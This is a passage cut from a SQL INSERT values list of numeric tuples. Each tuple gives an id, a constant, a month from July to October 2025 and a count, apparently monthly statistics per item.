,2,'202507',19),(5153,2,'202507',19),(5271,2,'202507',19),(5307,2,'202507',19),(488,2,'202507',20),(1722,2,'202507',20),(1734,2,'202507',20),(1782,2,'202507',20),(2063,2,'202507',20),(3285,2,'202507',20),(3297,2,'202507',20),(3313,2,'202507',20),(3752,2,'202507',20),(3764,2,'202507',20),(4335,2,'202507',20),(4608,2,'202507',20),(4657,2,'202507',20),(4688,2,'202507',20),(4750,2,'202507',20),(5134,2,'202507',20),(5137,2,'202507',20),(5163,2,'202507',20),(5292,2,'202507',20),(5304,2,'202507',20),(5359,2,'202507',20),(478,2,'202507',21),(1602,2,'202507',21),(1604,2,'202507',21),(1606,2,'202507',21),(1699,2,'202507',21),(1707,2,'202507',21),(2309,2,'202507',21),(2658,2,'202507',21),(2956,2,'202507',21),(2993,2,'202507',21),(3079,2,'202507',21),(3316,2,'202507',21),(3721,2,'202507',21),(3771,2,'202507',21),(3774,2,'202507',21),(4275,2,'202507',21),(4566,2,'202507',21),(4582,2,'202507',21),(4685,2,'202507',21),(4768,2,'202507',21),(5131,2,'202507',21),(5268,2,'202507',21),(5298,2,'202507',21),(1596,2,'202507',22),(1737,2,'202507',22),(1741,2,'202507',22),(2964,2,'202507',22),(3482,2,'202507',22),(3541,2,'202507',22),(3727,2,'202507',22),(4697,2,'202507',22),(5037,2,'202507',22),(5253,2,'202507',22),(5256,2,'202507',22),(5289,2,'202507',22),(5310,2,'202507',22),(5374,2,'202507',22),(1711,2,'202507',23),(2297,2,'202507',23),(2769,2,'202507',23),(3045,2,'202507',23),(3087,2,'202507',23),(3124,2,'202507',23),(3430,2,'202507',23),(3531,2,'202507',23),(3735,2,'202507',23),(3742,2,'202507',23),(3749,2,'202507',23),(3777,2,'202507',23),(4329,2,'202507',23),(4391,2,'202507',23),(4677,2,'202507',23),(4709,2,'202507',23),(4996,2,'202507',23),(5054,2,'202507',23),(472,2,'202507',24),(479,2,'202507',24),(570,2,'202507',24),(1709,2,'202507',24),(2617,2,'202507',24),(2801,2,'202507',24),(3030,2,'202507',24),(3066,2,'202507',24),(3226,2,'202507',24),(3534,2,'202507',24),(4654,2,'202507',24),(4660,2,'202507',24),(4663,2,'202507',24),(4703,2,'202507',24),(4977,2,'202507',24),(5101,2,'202507',24),(5280,2,'202507',24),(471,2,'202507',25),(477,2,'202507',25),(1610,2,'202507',25),(1778,2,'202507',25),(2989,2,'202507',25),(3038,2,'202507',25),(3127,2,'202507',25),(3489,2,'202507',25),(4332,2,'202507',25),(4400,2,'202507',25),(4524,2,'202507',25),(4529,2,'202507',25),(4712,2,'202507',25),(4744,2,'202507',25),(4753,2,'202507',25),(5317,2,'202507',25),(5353,2,'202507',25),(5472,2,'202507',25),(485,2,'202507',26),(1730,2,'202507',26),(1745,2,'202507',26),(2804,2,'202507',26),(3034,2,'202507',26),(3117,2,'202507',26),(3710,2,'202507',26),(4323,2,'202507',26),(4645,2,'202507',26),(4888,2,'202507',26),(5314,2,'202507',26),(1584,2,'202507',27),(4756,2,'202507',27),(5363,2,'202507',27),(469,2,'202507',28),(1715,2,'202507',28),(3731,2,'202507',28),(4556,2,'202507',28),(5058,2,'202507',28),(5276,2,'202507',28),(5295,2,'202507',28),(5356,2,'202507',28),(5378,2,'202507',28),(1705,2,'202507',29),(1770,2,'202507',29),(3027,2,'202507',29),(3479,2,'202507',29),(3486,2,'202507',29),(4238,2,'202507',29),(5301,2,'202507',29),(476,2,'202507',30),(1612,2,'202507',30),(1701,2,'202507',30),(3063,2,'202507',30),(3259,2,'202507',30),(1592,2,'202507',31),(1614,2,'202507',31),(3290,2,'202507',31),(3438,2,'202507',31),(4301,2,'202507',31),(1703,2,'202507',32),(1768,2,'202507',34),(3004,2,'202507',34),(4612,2,'202507',34),(5467,2,'202507',34),(1598,2,'202507',35),(3251,2,'202507',35),(3498,2,'202507',35),(4520,2,'202507',35),(4980,2,'202507',35),(4420,2,'202507',36),(5259,2,'202507',36),(4776,2,'202507',37),(5157,2,'202507',37),(1728,2,'202507',38),(4651,2,'202507',38),(2704,2,'202507',39),(467,2,'202507',40),(1732,2,'202507',41),(2775,2,'202507',41),(3724,2,'202507',41),(5062,2,'202507',41),(5433,2,'202507',41),(1766,2,'202507',42),(2813,2,'202507',45),(5425,2,'202507',45),(5412,2,'202507',48),(5397,2,'202507',50),(5415,2,'202507',52),(468,2,'202507',53),(473,2,'202507',54),(3083,2,'202507',54),(470,2,'202507',55),(3023,2,'202507',55),(1544,2,'202507',57),(5400,2,'202507',60),(487,2,'202507',61),(1586,2,'202507',65),(5409,2,'202507',66),(5461,2,'202507',66),(5464,2,'202507',69),(5515,2,'202507',70),(74,2,'202507',71),(5140,2,'202507',71),(474,2,'202507',76),(5420,2,'202507',76),(1582,2,'202507',77),(5436,2,'202507',77),(4930,2,'202507',81),(5449,2,'202507',82),(5512,2,'202507',82),(5406,2,'202507',83),(84,2,'202507',84),(108,2,'202507',84),(5457,2,'202507',89),(5428,2,'202507',91),(5492,2,'202507',91),(4587,2,'202507',97),(5489,2,'202507',97),(5454,2,'202507',99),(5441,2,'202507',125),(3781,2,'202507',126),(2503,2,'202507',144),(335,2,'202507',150),(2904,2,'202507',157),(91,2,'202507',165),(87,2,'202507',176),(3060,2,'202507',179),(5502,2,'202507',189),(89,2,'202507',192),(4591,2,'202507',194),(76,2,'202507',209),(72,2,'202507',268),(68,2,'202507',312),(80,2,'202507',6204),(9,2,'202507',15999),(110,2,'202508',11),(106,2,'202508',13),(3280,2,'202508',17),(4858,2,'202508',18),(3287,2,'202508',19),(5028,2,'202508',19),(3107,2,'202508',21),(4691,2,'202508',21),(4744,2,'202508',21),(3104,2,'202508',22),(4591,2,'202508',22),(1695,2,'202508',23),(4357,2,'202508',23),(4404,2,'202508',23),(1596,2,'202508',24),(1697,2,'202508',24),(2991,2,'202508',24),(3092,2,'202508',24),(4238,2,'202508',24),(4387,2,'202508',24),(4668,2,'202508',24),(4870,2,'202508',24),(3038,2,'202508',25),(3097,2,'202508',25),(3109,2,'202508',25),(3282,2,'202508',25),(3714,2,'202508',25),(4391,2,'202508',25),(4663,2,'202508',25),(4674,2,'202508',25),(4878,2,'202508',25),(4587,2,'202508',26),(5326,2,'202508',26),(102,2,'202508',27),(1602,2,'202508',27),(3096,2,'202508',27),(3090,2,'202508',28),(4977,2,'202508',28),(4762,2,'202508',29),(5268,2,'202508',29),(1592,2,'202508',30),(1734,2,'202508',30),(5140,2,'202508',30),(5080,2,'202508',31),(5256,2,'202508',31),(2297,2,'202508',32),(3541,2,'202508',32),(4768,2,'202508',32),(5134,2,'202508',32),(2293,2,'202508',33),(2296,2,'202508',33),(3746,2,'202508',33),(4400,2,'202508',33),(5601,2,'202508',33),(4436,2,'202508',38),(4776,2,'202508',38),(1588,2,'202508',39),(4802,2,'202508',40),(3269,2,'202508',41),(4382,2,'202508',41),(1606,2,'202508',42),(3273,2,'202508',42),(3738,2,'202508',42),(4408,2,'202508',42),(4428,2,'202508',42),(4792,2,'202508',42),(4980,2,'202508',42),(1713,2,'202508',43),(1772,2,'202508',43),(2989,2,'202508',43),(3247,2,'202508',43),(4416,2,'202508',43),(4546,2,'202508',43),(4685,2,'202508',43),(4897,2,'202508',43),(5037,2,'202508',43),(5289,2,'202508',43),(1720,2,'202508',44),(2156,2,'202508',44),(2161,2,'202508',44),(2609,2,'202508',44),(3079,2,'202508',44),(3102,2,'202508',44),(3229,2,'202508',44),(3240,2,'202508',44),(3297,2,'202508',44),(3727,2,'202508',44),(4341,2,'202508',44),(4681,2,'202508',44),(4883,2,'202508',44),(5020,2,'202508',44),(5046,2,'202508',44),(5050,2,'202508',44),(5295,2,'202508',44),(5598,2,'202508',44),(1709,2,'202508',45),(1747,2,'202508',45),(2063,2,'202508',45),(2248,2,'202508',45),(3034,2,'202508',45),(3072,2,'202508',45),(3253,2,'202508',45),(3267,2,'202508',45),(3438,2,'202508',45),(4335,2,'202508',45),(4338,2,'202508',45),(4517,2,'202508',45),(4677,2,'202508',45),(4706,2,'202508',45),(4862,2,'202508',45),(5024,2,'202508',45),(5253,2,'202508',45),(1699,2,'202508',46),(1730,2,'202508',46),(1751,2,'202508',46),(2252,2,'202508',46),(3006,2,'202508',46),(3243,2,'202508',46),(3251,2,'202508',46),(3263,2,'202508',46),(3278,2,'202508',46),(3498,2,'202508',46),(3771,2,'202508',46),(4432,2,'202508',46),(4514,2,'202508',46),(4542,2,'202508',46),(4797,2,'202508',46),(5033,2,'202508',46),(1707,2,'202508',47),(1732,2,'202508',47),(1741,2,'202508',47),(2150,2,'202508',47),(2159,2,'202508',47),(2178,2,'202508',47),(3004,2,'202508',47),(3257,2,'202508',47),(3271,2,'202508',47),(3307,2,'202508',47),(4440,2,'202508',47),(4657,2,'202508',47),(4694,2,'202508',47),(4709,2,'202508',47),(4874,2,'202508',47),(4893,2,'202508',47),(5122,2,'202508',47),(1705,2,'202508',48),(1743,2,'202508',48),(1749,2,'202508',48),(1768,2,'202508',48),(2148,2,'202508',48),(3063,2,'202508',48),(3249,2,'202508',48),(3261,2,'202508',48),(3265,2,'202508',48),(3285,2,'202508',48),(3316,2,'202508',48),(3430,2,'202508',48),(3752,2,'202508',48),(4332,2,'202508',48),(4363,2,'202508',48),(4654,2,'202508',48),(4700,2,'202508',48),(5054,2,'202508',48),(5137,2,'202508',48),(479,2,'202508',49),(1711,2,'202508',49),(1726,2,'202508',49),(1737,2,'202508',49),(1739,2,'202508',49),(1782,2,'202508',49),(2152,2,'202508',49),(2165,2,'202508',49),(2558,2,'202508',49),(2751,2,'202508',49),(3275,2,'202508',49),(3486,2,'202508',49),(3774,2,'202508',49),(4326,2,'202508',49),(4373,2,'202508',49),(4396,2,'202508',49),(4444,2,'202508',49),(4697,2,'202508',49),(4759,2,'202508',49),(4866,2,'202508',49),(5292,2,'202508',49),(3045,2,'202508',50),(3731,2,'202508',50),(3735,2,'202508',50),(4424,2,'202508',50),(4454,2,'202508',50),(4645,2,'202508',50),(4703,2,'202508',50),(4888,2,'202508',50),(5042,2,'202508',50),(5301,2,'202508',50),(5334,2,'202508',50),(5359,2,'202508',50),(480,2,'202508',51),(1701,2,'202508',51),(4412,2,'202508',51),(4420,2,'202508',51),(4448,2,'202508',51),(4660,2,'202508',51),(4722,2,'202508',51),(5304,2,'202508',51),(5317,2,'202508',51),(570,2,'202508',52),(1728,2,'202508',52),(1770,2,'202508',52),(2801,2,'202508',52),(3027,2,'202508',52),(3041,2,'202508',52),(3066,2,'202508',52),(3087,2,'202508',52),(3245,2,'202508',52),(3290,2,'202508',52),(3531,2,'202508',52),(3721,2,'202508',52),(4457,2,'202508',52),(4688,2,'202508',52),(4771,2,'202508',52),(5271,2,'202508',52),(483,2,'202508',53),(486,2,'202508',53),(1715,2,'202508',53),(2457,2,'202508',53),(2658,2,'202508',53),(2965,2,'202508',53),(2993,2,'202508',53),(3534,2,'202508',53),(3764,2,'202508',53),(4377,2,'202508',53),(4988,2,'202508',53),(5101,2,'202508',53),(5128,2,'202508',53),(482,2,'202508',54),(485,2,'202508',54),(2154,2,'202508',54),(2617,2,'202508',54),(2964,2,'202508',54),(3069,2,'202508',54),(3127,2,'202508',54),(3226,2,'202508',54),(3489,2,'202508',54),(4582,2,'202508',54),(4608,2,'202508',54),(4648,2,'202508',54),(4741,2,'202508',54),(4753,2,'202508',54),(4756,2,'202508',54),(4996,2,'202508',54),(5298,2,'202508',54),(5320,2,'202508',54),(1612,2,'202508',55),(1774,2,'202508',55),(1780,2,'202508',55),(2769,2,'202508',55),(3005,2,'202508',55),(3117,2,'202508',55),(4566,2,'202508',55),(4747,2,'202508',55),(4765,2,'202508',55),(4976,2,'202508',55),(5125,2,'202508',55),(5248,2,'202508',55),(5276,2,'202508',55),(5307,2,'202508',55),(5330,2,'202508',55),(5353,2,'202508',55),(478,2,'202508',56),(1610,2,'202508',56),(3030,2,'202508',56),(3742,2,'202508',56),(4275,2,'202508',56),(4551,2,'202508',56),(4556,2,'202508',56),(5314,2,'202508',56),(5374,2,'202508',56),(5593,2,'202508',56),(477,2,'202508',57),(481,2,'202508',57),(1703,2,'202508',57),(1718,2,'202508',57),(3479,2,'202508',57),(3777,2,'202508',57),(4520,2,'202508',57),(4524,2,'202508',57),(5131,2,'202508',57),(5146,2,'202508',57),(471,2,'202508',58),(488,2,'202508',58),(1584,2,'202508',58),(1594,2,'202508',58),(1722,2,'202508',58),(1766,2,'202508',58),(2704,2,'202508',58),(3482,2,'202508',58),(3724,2,'202508',58),(4712,2,'202508',58),(5472,2,'202508',58),(484,2,'202508',59),(1776,2,'202508',59),(2748,2,'202508',59),(3710,2,'202508',59),(4323,2,'202508',59),(4651,2,'202508',59),(4983,2,'202508',59),(5058,2,'202508',59),(5076,2,'202508',59),(1604,2,'202508',60),(2809,2,'202508',60),(3124,2,'202508',60),(4329,2,'202508',60),(5163,2,'202508',60),(5383,2,'202508',60),(1724,2,'202508',61),(5323,2,'202508',61),(476,2,'202508',62),(4529,2,'202508',62),(5378,2,'202508',62),(1600,2,'202508',63),(1608,2,'202508',63),(1745,2,'202508',63),(5153,2,'202508',63),(5157,2,'202508',63),(5264,2,'202508',63),(5489,2,'202508',63),(472,2,'202508',64),(2956,2,'202508',64),(5310,2,'202508',64),(1590,2,'202508',65),(4301,2,'202508',65),(3259,2,'202508',66),(3749,2,'202508',66),(469,2,'202508',67),(4368,2,'202508',67),(5356,2,'202508',67),(4750,2,'202508',68),(5071,2,'202508',68),(2775,2,'202508',71),(2804,2,'202508',71),(1614,2,'202508',73),(4612,2,'202508',73),(5062,2,'202508',73),(5457,2,'202508',73),(2309,2,'202508',74),(5433,2,'202508',75),(2911,2,'202508',76),(3313,2,'202508',76),(5363,2,'202508',77),(5400,2,'202508',79),(5425,2,'202508',79),(3083,2,'202508',80),(5067,2,'202508',80),(467,2,'202508',81),(3023,2,'202508',81),(5467,2,'202508',81),(5280,2,'202508',84),(5415,2,'202508',86),(5412,2,'202508',88),(1778,2,'202508',89),(5464,2,'202508',89),(1544,2,'202508',91),(5259,2,'202508',94),(5397,2,'202508',95),(5492,2,'202508',95),(5409,2,'202508',96),(473,2,'202508',98),(1598,2,'202508',98),(5461,2,'202508',98),(1586,2,'202508',100),(2813,2,'202508',101),(5454,2,'202508',101),(470,2,'202508',103),(487,2,'202508',103),(5428,2,'202508',103),(5449,2,'202508',104),(5436,2,'202508',107),(5585,2,'202508',107),(5441,2,'202508',108),(5578,2,'202508',110),(5567,2,'202508',117),(468,2,'202508',118),(5515,2,'202508',121),(5406,2,'202508',123),(74,2,'202508',125),(474,2,'202508',126),(5420,2,'202508',140),(5512,2,'202508',147),(3781,2,'202508',152),(4930,2,'202508',155),(84,2,'202508',161),(5502,2,'202508',161),(1582,2,'202508',168),(108,2,'202508',170),(87,2,'202508',182),(5582,2,'202508',192),(2904,2,'202508',222),(91,2,'202508',223),(5570,2,'202508',224),(3060,2,'202508',242),(5561,2,'202508',244),(2503,2,'202508',260),(335,2,'202508',263),(76,2,'202508',266),(89,2,'202508',329),(68,2,'202508',440),(72,2,'202508',460),(80,2,'202508',9347),(9,2,'202508',20410),(106,2,'202509',14),(3109,2,'202509',18),(4404,2,'202509',19),(1697,2,'202509',20),(4870,2,'202509',20),(4858,2,'202509',22),(1695,2,'202509',23),(4878,2,'202509',23),(3092,2,'202509',24),(3096,2,'202509',24),(3280,2,'202509',24),(3541,2,'202509',24),(5028,2,'202509',24),(3090,2,'202509',25),(4744,2,'202509',25),(4762,2,'202509',25),(5080,2,'202509',25),(3714,2,'202509',26),(4357,2,'202509',26),(4691,2,'202509',26),(3104,2,'202509',27),(5140,2,'202509',27),(5256,2,'202509',27),(5268,2,'202509',27),(1596,2,'202509',28),(3107,2,'202509',28),(3282,2,'202509',28),(4391,2,'202509',28),(4768,2,'202509',28),(2991,2,'202509',29),(5326,2,'202509',29),(102,2,'202509',30),(1602,2,'202509',30),(3746,2,'202509',31),(4674,2,'202509',31),(4587,2,'202509',32),(4663,2,'202509',32),(5134,2,'202509',32),(4238,2,'202509',34),(4668,2,'202509',34),(110,2,'202509',35),(3287,2,'202509',35),(4980,2,'202509',35),(1734,2,'202509',36),(4776,2,'202509',36),(4387,2,'202509',37),(1592,2,'202509',38),(1606,2,'202509',40),(4591,2,'202509',41),(3097,2,'202509',42),(2297,2,'202509',43),(4977,2,'202509',49),(3038,2,'202509',55),(1588,2,'202509',59),(1728,2,'202509',59),(3297,2,'202509',60),(4400,2,'202509',61),(3102,2,'202509',67),(1586,2,'202509',104),(5415,2,'202509',105),(5489,2,'202509',105),(5567,2,'202509',130),(5428,2,'202509',145),(5457,2,'202509',147),(76,2,'202509',213),(1772,2,'202509',291),(1745,2,'202509',293),(1732,2,'202509',295),(2156,2,'202509',296),(2293,2,'202509',300),(2252,2,'202509',302),(2248,2,'202509',304),(1709,2,'202509',305),(1747,2,'202509',307),(2296,2,'202509',307),(3072,2,'202509',322),(4363,2,'202509',325),(3063,2,'202509',326),(3066,2,'202509',327),(4436,2,'202509',330),(4428,2,'202509',333),(4416,2,'202509',335),(3045,2,'202509',337),(1751,2,'202509',340),(3124,2,'202509',341),(1749,2,'202509',343),(1713,2,'202509',346),(1743,2,'202509',346),(1720,2,'202509',347),(3069,2,'202509',348),(1711,2,'202509',349),(4883,2,'202509',349),(2993,2,'202509',350),(3117,2,'202509',350),(1707,2,'202509',351),(3034,2,'202509',351),(3247,2,'202509',351),(1715,2,'202509',352),(3290,2,'202509',352),(1722,2,'202509',355),(3079,2,'202509',355),(3127,2,'202509',355),(4420,2,'202509',356),(3273,2,'202509',357),(1705,2,'202509',358),(1701,2,'202509',359),(1737,2,'202509',362),(1726,2,'202509',363),(1730,2,'202509',364),(1741,2,'202509',367),(1739,2,'202509',368),(1768,2,'202509',369),(3307,2,'202509',369),(3257,2,'202509',372),(3265,2,'202509',375),(3261,2,'202509',376),(3267,2,'202509',376),(1724,2,'202509',377),(3269,2,'202509',377),(3285,2,'202509',377),(3249,2,'202509',379),(3253,2,'202509',379),(3263,2,'202509',381),(3731,2,'202509',381),(5037,2,'202509',381),(5050,2,'202509',381),(3278,2,'202509',382),(5024,2,'202509',382),(3027,2,'202509',384),(3030,2,'202509',384),(3316,2,'202509',384),(5020,2,'202509',384),(2609,2,'202509',385),(4651,2,'202509',385),(3727,2,'202509',386),(5046,2,'202509',386),(2150,2,'202509',387),(2161,2,'202509',387),(4654,2,'202509',387),(5054,2,'202509',387),(2063,2,'202509',388),(2148,2,'202509',388),(2154,2,'202509',388),(2658,2,'202509',388),(4706,2,'202509',388),(2165,2,'202509',389),(2152,2,'202509',390),(1699,2,'202509',392),(2178,2,'202509',392),(3087,2,'202509',392),(3735,2,'202509',392),(4382,2,'202509',392),(4765,2,'202509',392),(4408,2,'202509',393),(4703,2,'202509',393),(4771,2,'202509',393),(3245,2,'202509',394),(3251,2,'202509',394),(3738,2,'202509',395),(4648,2,'202509',397),(4802,2,'202509',397),(3060,2,'202509',398),(3240,2,'202509',398),(5042,2,'202509',398),(3243,2,'202509',400),(3313,2,'202509',400),(3438,2,'202509',400),(4329,2,'202509',400),(4797,2,'202509',400),(4440,2,'202509',401),(4709,2,'202509',401),(4866,2,'202509',401),(5253,2,'202509',402),(4542,2,'202509',403),(4792,2,'202509',404),(4323,2,'202509',405),(570,2,'202509',406),(3275,2,'202509',406),(4700,2,'202509',406),(3259,2,'202509',407),(5289,2,'202509',407),(3229,2,'202509',408),(3430,2,'202509',408),(4332,2,'202509',408),(4657,2,'202509',408),(4897,2,'202509',408),(5295,2,'202509',408),(3498,2,'202509',409),(4444,2,'202509',409),(3005,2,'202509',410),(3531,2,'202509',411),(4326,2,'202509',411),(4862,2,'202509',411),(4893,2,'202509',411),(4546,2,'202509',412),(4566,2,'202509',412),(4688,2,'202509',412),(1782,2,'202509',413),(2964,2,'202509',413),(3004,2,'202509',413),(3752,2,'202509',413),(4424,2,'202509',413),(3534,2,'202509',414),(3764,2,'202509',415),(4275,2,'202509',415),(4341,2,'202509',415),(4753,2,'202509',415),(3724,2,'202509',416),(4335,2,'202509',416),(2769,2,'202509',417),(3006,2,'202509',417),(3479,2,'202509',417),(4368,2,'202509',417),(4432,2,'202509',417),(4677,2,'202509',417),(2159,2,'202509',418),(2965,2,'202509',418),(3489,2,'202509',418),(3742,2,'202509',418),(4514,2,'202509',418),(4645,2,'202509',418),(4694,2,'202509',418),(4874,2,'202509',418),(1770,2,'202509',419),(3271,2,'202509',419),(1776,2,'202509',420),(1780,2,'202509',420),(2748,2,'202509',420),(2751,2,'202509',420),(3721,2,'202509',420),(4338,2,'202509',420),(4685,2,'202509',420),(4888,2,'202509',420),(5033,2,'202509',420),(5137,2,'202509',420),(5271,2,'202509',420),(1610,2,'202509',421),(2989,2,'202509',421),(4373,2,'202509',422),(4396,2,'202509',422),(4747,2,'202509',422),(5280,2,'202509',422),(3710,2,'202509',423),(5122,2,'202509',423),(5276,2,'202509',423),(1703,2,'202509',424),(3777,2,'202509',424),(4454,2,'202509',424),(4517,2,'202509',424),(4756,2,'202509',424),(4976,2,'202509',424),(4996,2,'202509',424),(5317,2,'202509',424),(3226,2,'202509',425),(4608,2,'202509',425),(4741,2,'202509',425),(5128,2,'202509',425),(1718,2,'202509',426),(3041,2,'202509',426),(3486,2,'202509',426),(4377,2,'202509',426),(4457,2,'202509',426),(4551,2,'202509',426),(5323,2,'202509',426),(5359,2,'202509',426),(1612,2,'202509',427),(2457,2,'202509',427),(2617,2,'202509',427),(2911,2,'202509',427),(2956,2,'202509',427),(3482,2,'202509',427),(4301,2,'202509',427),(4681,2,'202509',427),(5292,2,'202509',427),(1774,2,'202509',428),(4448,2,'202509',428),(4697,2,'202509',428),(1614,2,'202509',429),(2558,2,'202509',429),(3771,2,'202509',430),(3774,2,'202509',430),(5058,2,'202509',430),(478,2,'202509',431),(1766,2,'202509',431),(5131,2,'202509',431),(5330,2,'202509',431),(483,2,'202509',432),(1590,2,'202509',432),(2801,2,'202509',432),(3749,2,'202509',432),(5298,2,'202509',432),(4412,2,'202509',433),(4988,2,'202509',433),(5067,2,'202509',433),(5071,2,'202509',433),(5304,2,'202509',433),(4524,2,'202509',434),(5307,2,'202509',434),(480,2,'202509',435),(4582,2,'202509',435),(5101,2,'202509',435),(3023,2,'202509',436),(5146,2,'202509',436),(5314,2,'202509',436),(477,2,'202509',437),(482,2,'202509',437),(1594,2,'202509',437),(2809,2,'202509',437),(4712,2,'202509',437),(5301,2,'202509',437),(5353,2,'202509',437),(5383,2,'202509',437),(5472,2,'202509',437),(472,2,'202509',438),(481,2,'202509',438),(4759,2,'202509',438),(5264,2,'202509',438),(5153,2,'202509',439),(488,2,'202509',440),(5310,2,'202509',440),(471,2,'202509',441),(484,2,'202509',441),(485,2,'202509',441),(4520,2,'202509',441),(4556,2,'202509',441),(4612,2,'202509',441),(5334,2,'202509',441),(5125,2,'202509',442),(486,2,'202509',443),(5374,2,'202509',443),(5157,2,'202509',444),(3083,2,'202509',445),(5378,2,'202509',445),(4529,2,'202509',446),(479,2,'202509',447),(2309,2,'202509',447),(2804,2,'202509',447),(4722,2,'202509',447),(5320,2,'202509',447),(476,2,'202509',448),(5356,2,'202509',448),(1600,2,'202509',449),(4983,2,'202509',449),(5248,2,'202509',449),(5363,2,'202509',449),(5467,2,'202509',449),(1604,2,'202509',450),(5259,2,'202509',450),(1584,2,'202509',453),(469,2,'202509',454),(4660,2,'202509',454),(4750,2,'202509',455),(5163,2,'202509',455),(1608,2,'202509',456),(5076,2,'202509',458),(2775,2,'202509',460),(2704,2,'202509',462),(5062,2,'202509',462),(1598,2,'202509',475),(487,2,'202509',476),(5425,2,'202509',476),(5585,2,'202509',477),(5412,2,'202509',489),(1544,2,'202509',490),(5578,2,'202509',491),(468,2,'202509',492),(5433,2,'202509',493),(473,2,'202509',495),(5400,2,'202509',495),(1778,2,'202509',497),(5461,2,'202509',500),(74,2,'202509',501),(5397,2,'202509',501),(2813,2,'202509',503),(5449,2,'202509',503),(108,2,'202509',505),(5515,2,'202509',505),(5454,2,'202509',509),(84,2,'202509',512),(467,2,'202509',515),(5409,2,'202509',516),(5492,2,'202509',517),(4930,2,'202509',519),(5406,2,'202509',519),(474,2,'202509',520),(5464,2,'202509',522),(5601,2,'202509',528),(5570,2,'202509',531),(5441,2,'202509',532),(5512,2,'202509',534),(5420,2,'202509',535),(5436,2,'202509',536),(3781,2,'202509',542),(470,2,'202509',543),(5605,2,'202509',544),(87,2,'202509',545),(5582,2,'202509',548),(5502,2,'202509',557),(5593,2,'202509',557),(1582,2,'202509',560),(5561,2,'202509',565),(335,2,'202509',584),(2904,2,'202509',584),(91,2,'202509',605),(5598,2,'202509',643),(68,2,'202509',807),(2503,2,'202509',972),(89,2,'202509',1355),(72,2,'202509',2029),(80,2,'202509',3993),(9,2,'202509',14053),(106,2,'202510',4),(5626,2,'202510',6),(1697,2,'202510',11),(4858,2,'202510',11),(5609,2,'202510',12),(4387,2,'202510',15),(4357,2,'202510',17),(102,2,'202510',18),(3104,2,'202510',19),(3541,2,'202510',19),(4404,2,'202510',19),(5256,2,'202510',19),(2296,2,'202510',20),(3090,2,'202510',20),(3096,2,'202510',20),(3109,2,'202510',20),(3714,2,'202510',20),(4391,2,'202510',20),(4744,2,'202510',20),(4768,2,'202510',20),(5080,2,'202510',20),(1695,2,'202510',21),(1709,2,'202510',21),(1747,2,'202510',21),(2293,2,'202510',21),(2991,2,'202510',21),(3107,2,'202510',21),(3280,2,'202510',21),(4440,2,'202510',21),(1732,2,'202510',22),(3092,2,'202510',22),(3746,2,'202510',22),(4797,2,'202510',22),(5054,2,'202510',22),(5140,2,'202510',22),(1720,2,'202510',23),(2156,2,'202510',23),(2252,2,'202510',23),(2748,2,'202510',23),(4428,2,'202510',23),(5028,2,'202510',23),(1734,2,'202510',24),(1737,2,'202510',24),(3287,2,'202510',24),(4668,2,'202510',24),(4674,2,'202510',24),(4691,2,'202510',24),(4762,2,'202510',24),(4802,2,'202510',24),(5326,2,'202510',24),(570,2,'202510',25),(1592,2,'202510',25),(1782,2,'202510',25),(3245,2,'202510',25),(3265,2,'202510',25),(3282,2,'202510',25),(4706,2,'202510',25),(5024,2,'202510',25),(5033,2,'202510',25),(1726,2,'202510',26),(1772,2,'202510',26),(2148,2,'202510',26),(2150,2,'202510',26),(2964,2,'202510',26),(3229,2,'202510',26),(3243,2,'202510',26),(3261,2,'202510',26),(3269,2,'202510',26),(4436,2,'202510',26),(4897,2,'202510',26),(1751,2,'202510',27),(2152,2,'202510',27),(2178,2,'202510',27),(2609,2,'202510',27),(3097,2,'202510',27),(3263,2,'202510',27),(3771,2,'202510',27),(4341,2,'202510',27),(4382,2,'202510',27),(4396,2,'202510',27),(4424,2,'202510',27),(4448,2,'202510',27),(4542,2,'202510',27),(4862,2,'202510',27),(4883,2,'202510',27),(4976,2,'202510',27),(4980,2,'202510',27),(5046,2,'202510',27),(5067,2,'202510',27),(5268,2,'202510',27),(1739,2,'202510',28),(2063,2,'202510',28),(3041,2,'202510',28),(3257,2,'202510',28),(4329,2,'202510',28),(4546,2,'202510',28),(4870,2,'202510',28),(5020,2,'202510',28),(5058,2,'202510',28),(5134,2,'202510',28),(5289,2,'202510',28),(478,2,'202510',29),(1707,2,'202510',29),(1741,2,'202510',29),(1743,2,'202510',29),(2248,2,'202510',29),(3004,2,'202510',29),(3027,2,'202510',29),(3247,2,'202510',29),(3738,2,'202510',29),(3764,2,'202510',29),(4338,2,'202510',29),(4368,2,'202510',29),(4408,2,'202510',29),(4444,2,'202510',29),(4703,2,'202510',29),(4866,2,'202510',29),(5037,2,'202510',29),(5253,2,'202510',29),(5359,2,'202510',29),(2154,2,'202510',30),(2617,2,'202510',30),(2751,2,'202510',30),(2965,2,'202510',30),(3005,2,'202510',30),(3087,2,'202510',30),(3240,2,'202510',30),(3249,2,'202510',30),(3278,2,'202510',30),(3430,2,'202510',30),(3482,2,'202510',30),(4363,2,'202510',30),(4416,2,'202510',30),(4432,2,'202510',30),(4657,2,'202510',30),(4700,2,'202510',30),(4776,2,'202510',30),(4988,2,'202510',30),(5050,2,'202510',30),(5071,2,'202510',30),(5101,2,'202510',30),(5271,2,'202510',30),(477,2,'202510',31),(480,2,'202510',31),(1699,2,'202510',31),(1713,2,'202510',31),(1768,2,'202510',31),(2165,2,'202510',31),(3226,2,'202510',31),(3267,2,'202510',31),(3285,2,'202510',31),(3479,2,'202510',31),(3531,2,'202510',31),(4323,2,'202510',31),(4326,2,'202510',31),(4591,2,'202510',31),(4765,2,'202510',31),(4893,2,'202510',31),(479,2,'202510',32),(1590,2,'202510',32),(1730,2,'202510',32),(1745,2,'202510',32),(1749,2,'202510',32),(1776,2,'202510',32),(3079,2,'202510',32),(3498,2,'202510',32),(4238,2,'202510',32),(4709,2,'202510',32),(4878,2,'202510',32),(4996,2,'202510',32),(5264,2,'202510',32),(482,2,'202510',33),(483,2,'202510',33),(1701,2,'202510',33),(1715,2,'202510',33),(2801,2,'202510',33),(3063,2,'202510',33),(3275,2,'202510',33),(4457,2,'202510',33),(4514,2,'202510',33),(4697,2,'202510',33),(4888,2,'202510',33),(5122,2,'202510',33),(5131,2,'202510',33),(5137,2,'202510',33),(5334,2,'202510',33),(484,2,'202510',34),(3438,2,'202510',34),(4377,2,'202510',34),(4551,2,'202510',34),(4654,2,'202510',34),(4677,2,'202510',34),(4771,2,'202510',34),(4792,2,'202510',34),(5248,2,'202510',34),(5292,2,'202510',34),(5356,2,'202510',34),(481,2,'202510',35),(1602,2,'202510',35),(1703,2,'202510',35),(2457,2,'202510',35),(3124,2,'202510',35),(3727,2,'202510',35),(4663,2,'202510',35),(4685,2,'202510',35),(4747,2,'202510',35),(5295,2,'202510',35)